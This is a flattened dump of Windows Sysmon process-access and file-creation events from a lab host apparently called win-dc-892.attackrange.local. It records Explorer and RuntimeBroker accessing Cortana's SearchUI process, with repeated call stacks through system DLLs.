10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.104{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.104{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.088{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132616657559560800.txt2021-03-31 12:02:36.088 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 